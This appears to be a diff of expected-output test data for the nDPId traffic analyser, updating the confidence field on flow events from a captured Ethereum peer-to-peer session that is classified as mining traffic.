00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1578508364925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364925,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHG4wAAEARgdzAqAG4I7T2qXZfdl0As6VnAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1578508364954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ91J1AACwRmVQjtPapwKgBuHZddl8EKaTIL6PiPVD76wxxux15bHRlnSs2av4nBFSV7v4bhHiIpeAMxLmbK8f6wiaJfQicCaKdl2RU3riNA4G85e32CrySn3+r4nugeiGUNmLmJTGwe70KAk\/1yl9pMbVr5iHiC9EbAQT5A7z5A7T4TYSnVnoygnZfgnZfuECQJNyxBglNPC+n9m4t\/W08TtywpdWYdWjkRxmhkajaDCz+gK\/mbTitDTyIYj\/DM6dFql13rAhhOsl+TepFcV7R+E2EVmvzPoJ2X4J2X7hAs1lDgaitKFA3cxLdFsLwt7VebQyms4a6o\/fivZtKo8AkJ6dL4w4Dn4+\/vC\/\/JsKeSIScYYBOpqnxxVMZ+XWFxvhNhIui\/9KCdl+Cdl+4QKesUvPGk3pcExPSpjjyYak+S\/zgRaKyCtkCAnADlTupsK\/kU6vbTyjVeYLvjRqhlLfuaobh1XsP1yYWbMEwCkP4TYROL5ObgnZfgnZfuEBjjxCUsfvwMHRxTE5YrP7+ISCuREmPbKrzjoabqIoNEUz\/YRnAV2w6k47DZjKIksCMD5bt88unhn0EsLYp\/SzX+E2EXkQ3ooJ2X4J2X7hAPuP3gMJbiMdT+jVwpl443XaSBNUfQ0qZUmbru+9L8er4h7zKFM+7c1K4WVxLv0mgiZa++5g5WXQyn8nQTgubb\/hNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4
TYQj6yXYgnZfgnZfuEC5nQSZ\/xzD17vSEoHg\/jtmGLuRaM3q97\/3Czva8FggRyrw44MHO8OtruMk8OoTJc88hHmdKvMBoeGC+K0eEhFi+E2Ep1ZKIYJ2XYJ2XbhAYZoPsgtYlBM737vFkYUTo\/9EphiWRNvy3F9PFQKE60Wg2vh7fDKeVFJ2s+C3+rlsvule\/8FMZch7lhCdhu+rUPhNhJ3mmFeCdl+Cdl+4QGQs+WUN2IadQlJdv2hYAS47TWT0deczhHq293QjQaQ5dBSGXZU4dOj17ZGw5OHFM97hStHWuydqVFmyRxRg\/w34TYQ050sDgsVJgsVJuEDzSXu93jNII3idYaebqM1QwrATGCoZMfOLWHKo8\/HNEvGmOW1TsZdycKJciiZgh6ud1sRz67L9tP+HeODfKFTV+E2EDfsOx4J2X4J2X7hAH7mV1eGOz5WoeIocWFwRYF7ZVBDRcdtaFFH5u23BFJ62FH1ch71cEmxc8OtYpiPqb2N3y6mQjsQPeWAgtQws9vhNhCPknjSCdl+Cdl+4QFeAPtyTjNbAmZsxJ+YSStMfUptpi+Ck9CtWlo\/Fnkmot5zzhg4wYebjEaqIDMNNKgYreTwT+o6X4euclIzcKBSEXhYgYA=="} 01017{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1578508364954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHF1J5AACwRm8sjtPapwKgBuHZddl8BsQR1SNeP1ZrG\/ZwtEcGW5vGA0sDGp78prdWhxHtDqEDU7PNKL6kZEdICkE\/ClTr5riDvJ\/S0Juy5pZvsiDZ34LyanRNXXRjpzjohXnlvDARKWl\/FPyuFUx\/5q7iG79kKNiaGAAT5AUT5ATz4TYS5GczRgm\/xgm\/xuEBa13f1PeAY+pXn+QDG2H2vRnbUjALc47yKM1DGaLaCBXAmqDZbTzNfSqGBTAVPFFnsJtnCFC0Fv0w0bIIRmdWp+E2EijsROoJ2X4J2X7hAJi3PrTUi8k0+hp72TGveiEIya6qIgjO27CDPgcM2XClPC4ML\/96HDCNIKvA6L6b3KKoTFoGm44u2hTJ2hJ9PJvhNhM+0ztiCdl+Cdl+4QCCTHaJCBMKOiAeM0+J0ILaNmDQGKBpq95aDifzAyS6BBPIijEGzkyTvF6L1V27y7PdVSWOVkbAaliLEx1mlVCv4TYRf2EBxgnX+gnX+uEAuHZY2QcmV8WQCz4M\/VG5LfG7tHam\/sFovnjhq\/yEXmxTFgIMHUbncizgn1Jn7XeiL7CoOoCVHxB7uvvn28VO3hF4WIGA="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"} 
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -181,29 +181,29 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"} 
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHKIQAAEAR+iHAqAG4QipS9nZfdl8As8h52l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} 
